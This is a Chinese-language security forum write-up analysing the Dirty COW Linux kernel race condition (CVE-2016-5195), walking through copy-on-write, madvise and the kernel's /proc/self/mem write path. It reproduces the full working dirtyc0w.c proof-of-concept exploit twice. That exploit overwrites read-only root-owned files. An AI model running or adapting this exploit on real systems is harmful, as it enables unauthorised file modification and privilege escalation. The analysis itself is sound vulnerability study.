[原创]Linux内核[CVE-2016-5195] (dirty COW)原理分析-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]Linux内核[CVE-2016-5195] (dirty COW)原理分析

发表于: 2020-12-11 18:44 16022

[原创]Linux内核[CVE-2016-5195] (dirty COW)原理分析

Roland_

2020-12-11 18:44

16022

Ubuntu 16.04,内核版本4.15.0-45-generic

清华源，就是快！

很快啊，编译好了。

一开始是aaaaaa

发现成功改掉。漏洞存在。

在了解漏洞细节之前，首先要明确如下概念。

P1 P2是两个process，而P2由P1fork()产生。那么此时其实P1和P2是共享一块空间的。当对这同一块空间进行了修改时，才会拷贝出一份。

这种考虑基于：

1.子进程中往往会调用exec()族的函数实现其具体的功能。(一个进程想要执行另一个程序。既然创建新进程的唯一方法为调用fork，该进程于是首先调用fork创建一个自身的拷贝，然后其中一个拷贝（通常为子进程）调用exec把自身替换成新的程序。这是诸如shell之类程序的典型用法) 。而exec族函数有一个特点是，当他执行成功时，控制流直接转向新的程序的起点（比如glibc pwn中最常用的，通过hijack mallochook去打one_gadget执行execve起shell）。

2.fork()实际只是创建了一个与父进程pid不一样的副本，如果这个时候把整个父进程的数据完整的拷贝一份到子进程的新空间，但exec系列函数在执行时会直接替换掉当前进程的地址空间。意味着我们做的拷贝是无效的，所以就要进行效率的优化

于是COW机制出现了。

Suppose, there is a process P1 that creates a new process P2 and then process P1 modifies page 3.
The below figures shows what happens before and after process P modifies page 3.

原型：int madvise(void *addr, size_t length, int advice);

告诉内核：在从 addr 指定的地址开始，长度等于 len 参数值的范围内，该区域的用户虚拟内存应遵循特定的使用模式。

advise参数选择如下：

此系统调用相当于通知内核addr～addr+len的内存在接下来不再使用，内核将释放掉这一块内存以节省空间，相应的页表项也会被置空。

1.首先我们创建了一个foo文件，并且他的权限是只读

2.我们以read_only打开，返回了f=fd。并获取了对应的文件描述符的状态储存到st结构体中（类型struct stat ）

3.接下来使用mmap将此文件的内容 以私有的写时复制 映射到了用户空间。其中各个参数代表的含义如下：

4.启动两个线程：madviseThread 和 procselfmemThread

参数为我们要写入的：m0000000字符串。

首先他以RDWR打开了 /proc/self/mem（对于当前进程来说，/proc/self/mem是进程的内存内容，通过修改该文件相当于直接修改当前进程的内存），但是如果你测试一下会发现：

这是因为：我们无法读取没有被正确映射的区域，只有读取的偏移值是被映射的区域才能正确读取内存内容。所以需要配合lseek来调整内存写的位置。原型如下：

我们在POC中将位置调整到mmap返回的位置（也就是文件被映射的位置）。SEEK_SET 参数告诉系统offset 即为新的读写位置。之后进行100000000次写操作来试图改变此内存的内容。（mmap的时候只有读权限）

这个线程很简单就是调用100000000次madvise将对应的mmap出来的addr空间到addr+100设置为MADV_DONTNEED

而这两个线程是跑在竞争态的。

经过以上的讲解，应该已经明白了大概是在干嘛。

dirty COW正如其名：dirty（脏）、COW（写时复制）

接下来深入竞争细节进行分析。

当 write(f,str,strlen(str)) 时调用流如下：

底层调用mem_rw，此时的file结构体对应的是 /proc/self/mem。buf是用户态的要写入的内容，count为大小，ppos为偏移。

首先新建一个mm_struct.

mm_struct 定义如下：

用来描述linux下进程的内存地址空间的所有的信息

他与task_struct的关系如下：

系统为每个进程维护一个task_struct（进程描述符），tast_struct记录了进程所有的context信息，而其中就包括了内存描述符mm_struct（其中的域抽象了进程的地址空间）

如果加上vma结构体的话：

其中重要的几个：

首先申请一个新的page，之后会进入 access_remote_vm

而 get_user_pages -> get_user_pages_locked -> \get_user_pages，这一系列调用是由于write系统调用在内核中会执行get_user_pages以获取需要写入的内存页。

__get_user_pages如下：

其中有几个关键点。

当第一次调用follow_page_mask的时候返回为NULL（对应的页表项指向的内存并没有写权限，与访问语义foll_flags冲突）。

接下来调用 faultin_page 进行处理。

调用流程如下：

结束后页调入，同时标脏。

在handle_pte_fault()中，如果触发异常的页存在于主存中，那么该异常往往是由写了一个只读页触发的，此时需要进行COW(写时复制操作)。也就是为自己重新分配一个页框，并把之前的数据复制到页框中去，再写。

第二次page fault结束后，FOLL_WRITE已经被置0.此时已经不再需要可写权限。

所以正常情况下，此时会拿到对应的内存页，然后可以直接做写操作。但是这个写操作是在mapped memory的，不会影响正常的磁盘文件。

但是这个时候如果出现线程madivseThread ,他将对应的mmap出来的空间设置为MADV_DONTNEED即在接下来不会被使用。此时内核将mapped memory对应的页表项置空(立刻换出对应的内存页)。第四次产生page fault

这样当再次write的时候，会触发page fault，由do_fault再次调页。而由于此时FOLL_WRITE为0，所以不会像第一次那样调入后由于写操作产生语义冲突。而是可以正常的返回对应的页，而接下来的写入操作会被同步到只读的文件中。从而造成了越权写。（因为没有做COW）

正常流程：

漏洞流程：

https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails

Copy on Write

https://blog.csdn.net/qq_26768741/article/details/54375524

mm_struct

https://www.cnblogs.com/wanpengcoder/p/11761063.html

Linux分页机制之分页机制的实现详解

Linux内存管理pagefault

用户空间缺页异常pte_handle_fault()分析--(下)--写时复制

KSM （Kernel Samepage Merging）

缺页异常的几种情况处理机制简介

sudo wget https://mirror.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.4.tar.xz

make bzImage -j4

MADV_ACCESS_DEFAULT
此标志将指定范围的内核预期访问模式重置为缺省设置。
 
MADV_ACCESS_LWP
此标志通知内核，移近指定地址范围的下一个 LWP 就是将要访问此范围次数最多的 LWP。内核将相应地为此范围和 LWP 分配内存和其他资源。
 
MADV_ACCESS_MANY
此标志建议内核，许多进程或 LWP 将在系统内随机访问指定的地址范围。内核将相应地为此范围分配内存和其他资源。
 
MADV_DONTNEED

Do not expect access in the near future.  (For the time being,

              the application is finished with the given range, so the

              kernel can free resources associated with it.)

MADV_ACCESS_DEFAULT

此标志将指定范围的内核预期访问模式重置为缺省设置。

MADV_ACCESS_LWP

此标志通知内核，移近指定地址范围的下一个 LWP 就是将要访问此范围次数最多的 LWP。内核将相应地为此范围和 LWP 分配内存和其他资源。

MADV_ACCESS_MANY

此标志建议内核，许多进程或 LWP 将在系统内随机访问指定的地址范围。内核将相应地为此范围分配内存和其他资源。

MADV_DONTNEED

Do not expect access in the near future. (For the time being,

the application is finished with the given range, so the

kernel can free resources associated with it.)

/*
####################### dirtyc0w.c #######################

$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo

$ ls -lah foo

-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo

this is not a test

$ gcc -pthread dirtyc0w.c -o dirtyc0w

$ ./dirtyc0w foo m00000000000000000

mmap 56123000

madvise 0

procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################

*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
 
void *map;

int f;
struct stat st;

char *name;
 
void *madviseThread(void *arg)
{

  char *str;

  str=(char*)arg;

  int i,c=0;

  for(i=0;i<100000000;i++)

  {

/*

You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661

> This is achieved by racing the madvise(MADV_DONTNEED) system call

> while having the page of the executable mmapped in memory.

*/

    c+=madvise(map,100,MADV_DONTNEED);

  }

  printf("madvise %d\n\n",c);
}
 
void *procselfmemThread(void *arg)
{

  char *str;

  str=(char*)arg;

/*

You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16

>  The in the wild exploit we are aware of doesn't work on Red Hat

>  Enterprise Linux 5 and 6 out of the box because on one side of

>  the race it writes to /proc/self/mem, but /proc/self/mem is not

>  writable on Red Hat Enterprise Linux 5 and 6.

*/

  int f=open("/proc/self/mem",O_RDWR);

  int i,c=0;

  for(i=0;i<100000000;i++) {

/*

You have to reset the file pointer to the memory position.

*/

    lseek(f,(uintptr_t) map,SEEK_SET);

    c+=write(f,str,strlen(str));

  }

  printf("procselfmem %d\n\n", c);
}
 
int main(int argc,char *argv[])
{

/*

You have to pass two arguments. File and Contents.

*/

  if (argc<3) {

  (void)fprintf(stderr, "%s\n",

      "usage: dirtyc0w target_file new_content");

  return 1; }

  pthread_t pth1,pth2;

/*

You have to open the file in read only mode.

*/

  f=open(argv[1],O_RDONLY);

  fstat(f,&st);

  name=argv[1];

/*

You have to use MAP_PRIVATE for copy-on-write mapping.

> Create a private copy-on-write mapping.  Updates to the

> mapping are not visible to other processes mapping the same

> file, and are not carried through to the underlying file.  It

> is unspecified whether changes made to the file after the

> mmap() call are visible in the mapped region.

*/

/*

You have to open with PROT_READ.

*/

  map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);

  printf("mmap %zx\n\n",(uintptr_t) map);

/*
You have to do it on two threads.

*/

  pthread_create(&pth1,NULL,madviseThread,argv[1]);

  pthread_create(&pth2,NULL,procselfmemThread,argv[2]);

/*

You have to wait for the threads to finish.

*/

  pthread_join(pth1,NULL);

  pthread_join(pth2,NULL);

  return 0;
}

/*

####################### dirtyc0w.c #######################

$ sudo -s

# echo this is not a test > foo

# chmod 0404 foo

$ ls -lah foo

-r-----r-- 1 root root 19 Oct 20 15:23 foo

$ cat foo

this is not a test

$ gcc -pthread dirtyc0w.c -o dirtyc0w

$ ./dirtyc0w foo m00000000000000000

mmap 56123000

madvise 0

procselfmem 1800000000

$ cat foo

m00000000000000000

####################### dirtyc0w.c #######################

*/

#include <stdio.h>

#include <sys/mman.h>

#include <fcntl.h>

#include <pthread.h>

#include <unistd.h>

#include <sys/stat.h>

#include <string.h>

#include <stdint.h>

void *map;

int f;

struct stat st;

char *name;

void *madviseThread(void *arg)

{

char *str;

str=(char*)arg;

int i,c=0;

for(i=0;i<100000000;i++)

{

/*

You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661

> This is achieved by racing the madvise(MADV_DONTNEED) system call

> while having the page of the executable mmapped in memory.

*/

c+=madvise(map,100,MADV_DONTNEED);

}

printf("madvise %d\n\n",c);

}

void *procselfmemThread(void *arg)

{

char *str;

str=(char*)arg;

/*

You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16

> The in the wild exploit we are aware of doesn't work on Red Hat

> Enterprise Linux 5 and 6 out of the box because on one side of

> the race it writes to /proc/self/mem, but /proc/self/mem is not

> writable on Red Hat Enterprise Linux 5 and 6.

*/

int f=open("/proc/self/mem",O_RDWR);

int i,c=0;

for(i=0;i<100000000;i++) {

/*

You have to reset the file pointer to the memory position.

*/

lseek(f,(uintptr_t) map,SEEK_SET);

c+=write(f,str,strlen(str));

}

printf("procselfmem %d\n\n", c);

}

int main(int argc,char *argv[])

{

/*

You have to pass two arguments. File and Contents.

*/

if (argc<3) {

(void)fprintf(stderr, "%s\n",

"usage: dirtyc0w target_file new_content");

return 1; }

pthread_t pth1,pth2;

/*

You have to open the file in read only mode.

*/

f=open(argv[1],O_RDONLY);

fstat(f,&st);

name=argv[1];

/*

You have to use MAP_PRIVATE for copy-on-write mapping.

> Create a private copy-on-write mapping. Updates to the

> mapping are not visible to other processes mapping the same

> file, and are not carried through to the underlying file. It

> is unspecified whether changes made to the file after the

> mmap() call are visible in the mapped region.

*/

/*

You have to open with PROT_READ.

*/

map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);

printf("mmap %zx\n\n",(uintptr_t) map);

/*

You have to do it on two threads.

*/

pthread_create(&pth1,NULL,madviseThread,argv[1]);

pthread_create(&pth2,NULL,procselfmemThread,argv[2]);

/*

You have to wait for the threads to finish.

*/

pthread_join(pth1,NULL);

pthread_join(pth2,NULL);

return 0;

}

struct stat64 {

    unsigned long long    st_dev;

    unsigned char    __pad0[4];
 
    unsigned long    __st_ino;
 
    unsigned int    st_mode;

    unsigned int    st_nlink;
 
    unsigned long    st_uid;

    unsigned long    st_gid;
 
    unsigned long long    st_rdev;

    unsigned char    __pad3[4];
 
    long long    st_size;

    unsigned long    st_blksize;
 
    /* Number 512-byte blocks allocated. */

    unsigned long long    st_blocks;
 
    unsigned long    st_atime;

    unsigned long    st_atime_nsec;
 
    unsigned long    st_mtime;

    unsigned int    st_mtime_nsec;
 
    unsigned long    st_ctime;

    unsigned long    st_ctime_nsec;
 
    unsigned long long    st_ino;
};

struct stat64 {

unsigned long long st_dev;

unsigned char __pad0[4];

unsigned long __st_ino;

unsigned int st_mode;

unsigned int st_nlink;

unsigned long st_uid;

unsigned long st_gid;

unsigned long long st_rdev;

unsigned char __pad3[4];

long long st_size;

unsigned long st_blksize;

/* Number 512-byte blocks allocated. */

unsigned long long st_blocks;

unsigned long st_atime;

unsigned long st_atime_nsec;

unsigned long st_mtime;

unsigned int st_mtime_nsec;

unsigned long st_ctime;

unsigned long st_ctime_nsec;

unsigned long long st_ino;

};

map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
 
//原型

void *mmap(void *addr, size_t length, int prot, int flags,

                  int fd, off_t offset);

map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);

//原型

void *mmap(void *addr, size_t length, int prot, int flags,

int fd, off_t offset);

root@ubuntu:~/linux-4.4-env# cat /proc/66310/mem

cat: /proc/66310/mem: Input/output error

root@ubuntu:~/linux-4.4-env# cat /proc/66310/mem

cat: /proc/66310/mem: Input/output error

off_t lseek(int fd, off_t offset, int whence);

__get_free_pages+14           

mem_rw.isra+69               

mem_write+27               

__vfs_write+55               

vfs_write+169               

sys_write+85

__get_free_pages+14

mem_rw.isra+69

mem_write+27

__vfs_write+55

vfs_write+169

sys_write+85

static ssize_t mem_write(struct file *file, const char __user *buf,

             size_t count, loff_t *ppos)
{

    return mem_rw(file, (char __user*)buf, count, ppos, 1);
}

static ssize_t mem_write(struct file *file, const char __user *buf,

size_t count, loff_t *ppos)

{

return mem_rw(file, (char __user*)buf, count, ppos, 1);

}

static ssize_t mem_rw(struct file *file, char __user *buf,

            size_t count, loff_t *ppos, int write)            //write=1
{

    struct mm_struct *mm = file->private_data;    

    unsigned long addr = *ppos;

    ssize_t copied;

    char *page;
 
    if (!mm)

        return 0;
 
    page = (char *)__get_free_page(GFP_TEMPORARY);        //获取一个free page,返回指向新页面的指针并将页面清零

    if (!page)

        return -ENOMEM;
 
    copied = 0;

    if (!atomic_inc_not_zero(&mm->mm_users))//atomic_inc_not_zero(v)用于将atomic_t变量*v加1，并测试加1后的*v是否不为零，如果不为零则返回真，这里将mm->mm_users+1，测试是否为0

        goto free;                            //为0的话就free掉
 
    while (count > 0) {                        //size大于0进入while
 
        int this_len = min_t(int, count, PAGE_SIZE);    //类型为int。count 返回 PAGE_SIZE中更小的那个
 
        if (write && copy_from_user(page, buf, this_len)) {// 将 buf拷贝size到新申请的page上

            copied = -EFAULT;

            break;

        }
 
        this_len = access_remote_vm(mm, addr, page, this_len, write); //write=1

        if (!this_len) {

            if (!copied)

                copied = -EIO;

            break;

        }
 
        if (!write && copy_to_user(buf, page, this_len)) {

            copied = -EFAULT;

            break;

        }
 
        buf += this_len;

        addr += this_len;

        copied += this_len;

        count -= this_len;

    }

    *ppos = addr;
 
    mmput(mm);
 
free:

    free_page((unsigned long) page);            //free申请出来的页

    return copied;
}

static ssize_t mem_rw(struct file *file, char __user *buf,

size_t count, loff_t *ppos, int write) //write=1

{

struct mm_struct *mm = file->private_data;

unsigned long addr = *ppos;

ssize_t copied;

char *page;

if (!mm)

return 0;

page = (char *)__get_free_page(GFP_TEMPORARY); //获取一个free page,返回指向新页面的指针并将页面清零

if (!page)

return -ENOMEM;

copied = 0;

if (!atomic_inc_not_zero(&mm->mm_users))//atomic_inc_not_zero(v)用于将atomic_t变量*v加1，并测试加1后的*v是否不为零，如果不为零则返回真，这里将mm->mm_users+1，测试是否为0

goto free; //为0的话就free掉

while (count > 0) { //size大于0进入while

int this_len = min_t(int, count, PAGE_SIZE); //类型为int。count 返回 PAGE_SIZE中更小的那个

if (write && copy_from_user(page, buf, this_len)) {// 将 buf拷贝size到新申请的page上

copied = -EFAULT;

break;

}

this_len = access_remote_vm(mm, addr, page, this_len, write); //write=1

if (!this_len) {

if (!copied)

copied = -EIO;

break;

}

if (!write && copy_to_user(buf, page, this_len)) {

copied = -EFAULT;

break;

}

buf += this_len;

addr += this_len;

copied += this_len;

count -= this_len;

}

*ppos = addr;

mmput(mm);

free:

free_page((unsigned long) page); //free申请出来的页

return copied;

}

struct mm_struct {
 
    //指向线性区对象的链表头

    struct vm_area_struct * mmap;       /* list of VMAs */

    //指向线性区对象的红黑树

    struct rb_root mm_rb;

    //指向最近找到的虚拟区间

    struct vm_area_struct * mmap_cache; /* last find_vma result */
 
    //用来在进程地址空间中搜索有效的进程地址空间的函数

    unsigned long (*get_unmapped_area) (struct file *filp,

                unsigned long addr, unsigned long len,

                unsigned long pgoff, unsigned long flags);
 
       unsigned long (*get_unmapped_exec_area) (struct file *filp,

                unsigned long addr, unsigned long len,

                unsigned long pgoff, unsigned long flags);
 
    //释放线性区时调用的方法，          

    void (*unmap_area) (struct mm_struct *mm, unsigned long addr);
 
    //标识第一个分配文件内存映射的线性地址

    unsigned long mmap_base;        /* base of mmap area */
 
    unsigned long task_size;        /* size of task vm space */

    /*

     * RHEL6 special for bug 790921: this same variable can mean

     * two different things. If sysctl_unmap_area_factor is zero,

     * this means the largest hole below free_area_cache. If the

     * sysctl is set to a positive value, this variable is used

     * to count how much memory has been munmapped from this process

     * since the last time free_area_cache was reset back to mmap_base.

     * This is ugly, but necessary to preserve kABI.

     */

    unsigned long cached_hole_size;
 
    //内核进程搜索进程地址空间中线性地址的空间空间

    unsigned long free_area_cache;      /* first hole of size cached_hole_size or larger */
 
    //指向页表的目录

    pgd_t * pgd;
 
    //共享进程时的个数

    atomic_t mm_users;          /* How many users with user space? */
 
    //内存描述符的主使用计数器，采用引用计数的原理，当为0时代表无用户再次使用

    atomic_t mm_count;          /* How many references to "struct mm_struct" (users count as 1) */
 
    //线性区的个数

    int map_count;              /* number of VMAs */
 
    struct rw_semaphore mmap_sem;
 
    //保护任务页表和引用计数的锁

    spinlock_t page_table_lock;     /* Protects page tables and some counters */
 
    //mm_struct结构，第一个成员就是初始化的mm_struct结构，

    struct list_head mmlist;        /* List of maybe swapped mm's.  These are globally strung

                         * together off init_mm.mmlist, and are protected

                         * by mmlist_lock

                         */
 
    /* Special counters, in some configurations protected by the

     * page_table_lock, in other configurations by being atomic.

     */
 
    mm_counter_t _file_rss;

    mm_counter_t _anon_rss;

    mm_counter_t _swap_usage;
 
    //进程拥有的最大页表数目

    unsigned long hiwater_rss;  /* High-watermark of RSS usage */、

    //进程线性区的最大页表数目

    unsigned long hiwater_vm;   /* High-water virtual memory usage */
 
    //进程地址空间的大小，锁住无法换页的个数，共享文件内存映射的页数，可执行内存映射中的页数

    unsigned long total_vm, locked_vm, shared_vm, exec_vm;

    //用户态堆栈的页数，

    unsigned long stack_vm, reserved_vm, def_flags, nr_ptes;

    //维护代码段和数据段

    unsigned long start_code, end_code, start_data, end_data;

    //维护堆和栈

    unsigned long start_brk, brk, start_stack;

    //维护命令行参数，命令行参数的起始地址和最后地址，以及环境变量的起始地址和最后地址

    unsigned long arg_start, arg_end, env_start, env_end;
 
    unsigned long saved_auxv[AT_VECTOR_SIZE]; /* for /proc/PID/auxv */
 
    struct linux_binfmt *binfmt;
 
    cpumask_t cpu_vm_mask;
 
    /* Architecture-specific MM context */

    mm_context_t context;
 
    /* Swap token stuff */

    /*

     * Last value of global fault stamp as seen by this process.

     * In other words, this value gives an indication of how long

     * it has been since this task got the token.

     * Look at mm/thrash.c

     */

    unsigned int faultstamp;

    unsigned int token_priority;

    unsigned int last_interval;
 
    //线性区的默认访问标志

    unsigned long flags; /* Must use atomic bitops to access the bits */
 
    struct core_state *core_state; /* coredumping support */
#ifdef CONFIG_AIO

    spinlock_t      ioctx_lock;

    struct hlist_head   ioctx_list;
#endif
#ifdef CONFIG_MM_OWNER

    /*

     * "owner" points to a task that is regarded as the canonical

     * user/owner of this mm. All of the following must be true in

     * order for it to be changed:

     *

     * current == mm->owner

     * current->mm != mm

     * new_owner->mm == mm

     * new_owner->alloc_lock is held

     */

    struct task_struct *owner;
#endif
 
#ifdef CONFIG_PROC_FS

    /* store ref to file /proc/<pid>/exe symlink points to */

    struct file *exe_file;

    unsigned long num_exe_file_vmas;
#endif
#ifdef CONFIG_MMU_NOTIFIER

    struct mmu_notifier_mm *mmu_notifier_mm;
#endif
#ifdef CONFIG_TRANSPARENT_HUGEPAGE

    pgtable_t pmd_huge_pte; /* protected by page_table_lock */
#endif

    /* reserved for Red Hat */
#ifdef __GENKSYMS__

    unsigned long rh_reserved[2];
#else

    /* How many tasks sharing this mm are OOM_DISABLE */

    union {

        unsigned long rh_reserved_aux;

        atomic_t oom_disable_count;

    };
 
    /* base of lib map area (ASCII armour) */

    unsigned long shlib_base;
#endif
};

struct mm_struct {

//指向线性区对象的链表头

struct vm_area_struct * mmap; /* list of VMAs */

//指向线性区对象的红黑树

struct rb_root mm_rb;

//指向最近找到的虚拟区间

struct vm_area_struct * mmap_cache; /* last find_vma result */

//用来在进程地址空间中搜索有效的进程地址空间的函数

unsigned long (*get_unmapped_area) (struct file *filp,

unsigned long addr, unsigned long len,

unsigned long pgoff, unsigned long flags);

unsigned long (*get_unmapped_exec_area) (struct file *filp,

unsigned long addr, unsigned long len,

unsigned long pgoff, unsigned long flags);

//释放线性区时调用的方法，

void (*unmap_area) (struct mm_struct *mm, unsigned long addr);

//标识第一个分配文件内存映射的线性地址

unsigned long mmap_base; /* base of mmap area */

unsigned long task_size; /* size of task vm space */

/*

* RHEL6 special for bug 790921: this same variable can mean

* two different things. If sysctl_unmap_area_factor is zero,

* this means the largest hole below free_area_cache. If the

* sysctl is set to a positive value, this variable is used

* to count how much memory has been munmapped from this process

* since the last time free_area_cache was reset back to mmap_base.

* This is ugly, but necessary to preserve kABI.

*/

unsigned long cached_hole_size;

//内核进程搜索进程地址空间中线性地址的空间空间

unsigned long free_area_cache; /* first hole of size cached_hole_size or larger */

//指向页表的目录

pgd_t * pgd;

//共享进程时的个数

atomic_t mm_users; /* How many users with user space? */

//内存描述符的主使用计数器，采用引用计数的原理，当为0时代表无用户再次使用

atomic_t mm_count; /* How many references to "struct mm_struct" (users count as 1) */

//线性区的个数

int map_count; /* number of VMAs */

struct rw_semaphore mmap_sem;

//保护任务页表和引用计数的锁

spinlock_t page_table_lock; /* Protects page tables and some counters */

//mm_struct结构，第一个成员就是初始化的mm_struct结构，

struct list_head mmlist; /* List of maybe swapped mm's. These are globally strung

* together off init_mm.mmlist, and are protected

* by mmlist_lock

*/

/* Special counters, in some configurations protected by the

* page_table_lock, in other configurations by being atomic.

*/

mm_counter_t _file_rss;

mm_counter_t _anon_rss;

mm_counter_t _swap_usage;

//进程拥有的最大页表数目

unsigned long hiwater_rss; /* High-watermark of RSS usage */、

//进程线性区的最大页表数目

unsigned long hiwater_vm; /* High-water virtual memory usage */

//

进程地址空间的大小，锁住无法换页的个数，共享文件内存映射的页数，可执行内存映射中的页数

unsigned long total_vm, locked_vm, shared_vm, exec_vm;

//用户态堆栈的页数，

unsigned long stack_vm, reserved_vm, def_flags, nr_ptes;

//维护代码段和数据段

unsigned long start_code, end_code, start_data, end_data;

//维护堆和栈

unsigned long start_brk, brk, start_stack;

//维护命令行参数，命令行参数的起始地址和最后地址，以及环境变量的起始地址和最后地址

unsigned long arg_start, arg_end, env_start, env_end;

unsigned long saved_auxv[AT_VECTOR_SIZE]; /* for /proc/PID/auxv */

struct linux_binfmt *binfmt;

cpumask_t cpu_vm_mask;

/* Architecture-specific MM context */

mm_context_t context;

/* Swap token stuff */

/*

* Last value of global fault stamp as seen by this process.

* In other words, this value gives an indication of how long

* it has been since this task got the token.

* Look at mm/thrash.c

*/

unsigned int faultstamp;

unsigned int token_priority;

unsigned int last_interval;

//线性区的默认访问标志

unsigned long flags; /* Must use atomic bitops to access the bits */

struct core_state *core_state; /* coredumping support */

#ifdef CONFIG_AIO

spinlock_t ioctx_lock;

struct hlist_head ioctx_list;

#endif

#ifdef CONFIG_MM_OWNER

/*

* "owner" points to a task that is regarded as the canonical

* user/owner of this mm. All of the following must be true in

* order for it to be changed:

*

* current == mm->owner

* current->mm != mm

* new_owner->mm == mm

* new_owner->alloc_lock is held

*/

struct task_struct *owner;

#endif

#ifdef CONFIG_PROC_FS

/* store ref to file /proc/<pid>/exe symlink points to */

struct file *exe_file;

unsigned long num_exe_file_vmas;

#endif

#ifdef CONFIG_MMU_NOTIFIER

struct mmu_notifier_mm *mmu_notifier_mm;

#endif

#ifdef CONFIG_TRANSPARENT_HUGEPAGE

pgtable_t pmd_huge_pte; /* protected by page_table_lock */

#endif

/* reserved for Red Hat */

#ifdef __GENKSYMS__

unsigned long rh_reserved[2];

#else

/* How many tasks sharing this mm are OOM_DISABLE */

union {

unsigned long rh_reserved_aux;

atomic_t oom_disable_count;

};

/* base of lib map area (ASCII armour) */

unsigned long shlib_base;

#endif

};

/**

 * access_remote_vm - access another process' address space

 * @mm:        the mm_struct of the target address space

 * @addr:    start address to access

 * @buf:    source or destination buffer

 * @len:    number of bytes to transfer

 * @write:    whether the access is a write

 *

 * The caller must hold a reference on @mm.

 */

int access_remote_vm(struct mm_struct *mm, unsigned long addr,

        void *buf, int len, int write)
{

    return __access_remote_vm(NULL, mm, addr, buf, len, write);
}

/**

* access_remote_vm - access another process' address space

* @mm: the mm_struct of the target address space

* @addr: start address to access

* @buf: source or destination buffer

* @len: number of bytes to transfer

* @write: whether the access is a write

*

* The caller must hold a reference on @mm.

*/

int access_remote_vm(struct mm_struct *mm, unsigned long addr,

void *buf, int len, int write)

{

return __access_remote_vm(NULL, mm, addr, buf, len, write);

}

/*

 * Access another process' address space as given in mm.  If non-NULL, use the

 * given task for page fault accounting.

 */

static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,

        unsigned long addr, void *buf, int len, int write)
{

    struct vm_area_struct *vma;

    void *old_buf = buf;
 
    down_read(&mm->mmap_sem);

    /* ignore errors, just check how much was successfully transferred */

    while (len) {

        int bytes, ret, offset;

        void *maddr;

        struct page *page = NULL;
 
        ret = get_user_pages(tsk, mm, addr, 1,

                write, 1, &page, &vma);
 
        if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT

            break;
#else

            /*

             * Check if this is a VM_IO | VM_PFNMAP VMA, which

             * we can access using slightly different code.

             */

            vma = find_vma(mm, addr);

            if (!vma || vma->vm_start > addr)

                break;

            if (vma->vm_ops && vma->vm_ops->access)

                ret = vma->vm_ops->access(vma, addr, buf,

                              len, write);

            if (ret <= 0)

                break;

            bytes = ret;
#endif

        } else {

            bytes = len;

            offset = addr & (PAGE_SIZE-1);

            if (bytes > PAGE_SIZE-offset)

                bytes = PAGE_SIZE-offset;
 
            maddr = kmap(page);

            if (write) {

                copy_to_user_page(vma, page, addr,

                          maddr + offset, buf, bytes);

                set_page_dirty_lock(page);

            } else {

                copy_from_user_page(vma, page, addr,

                            buf, maddr + offset, bytes);

            }

            kunmap(page);

            page_cache_release(page);

        }

        len -= bytes;

        buf += bytes;

        addr += bytes;

    }

    up_read(&mm->mmap_sem);
 
    return buf - old_buf;
}

/*

* Access another process' address space as given in mm. If non-NULL, use the

* given task for page fault accounting.

*/

static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,

unsigned long addr, void *buf, int len, int write)

{

struct vm_area_struct *vma;

void *old_buf = buf;

down_read(&mm->mmap_sem);

/* ignore errors, just check how much was successfully transferred */

while (len) {

int bytes, ret, offset;

void *maddr;

struct page *page = NULL;

ret = get_user_pages(tsk, mm, addr, 1,

write, 1, &page, &vma);

if (ret <= 0) {

登录后可查看完整内容

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

最后于 2021-1-13 13:19 被Roland_编辑，原因：

收藏・2

免费・11

支持

赞赏记录

参与人

雪币

留言

时间

QinBeast

看雪因你而更加精彩！

2024-9-6 06:54

榆一

为你点赞~

2022-7-29 16:19

PLEBFE

为你点赞~

2022-7-27 01:15

心游尘世外

为你点赞~

2022-7-26 23:03

飘零丶

为你点赞~

2022-7-17 02:46

ktink

为你点赞~

2021-3-1 10:22

Roland_

为你点赞~

2020-12-12 20:40

34r7hm4n

为你点赞~

2020-12-12 14:52

1wc

为你点赞~

2020-12-12 13:58

文星镇街霸

为你点赞~

2020-12-11 20:10

yichen115

为你点赞~

2020-12-11 19:49

最新回复 (1)
K1ose 雪币： 235 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	K1ose 2 楼 mm_struct里面应该是mm_count，而不是mm_counter，虽然不是什么大问题 2021-11-21 19:35 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复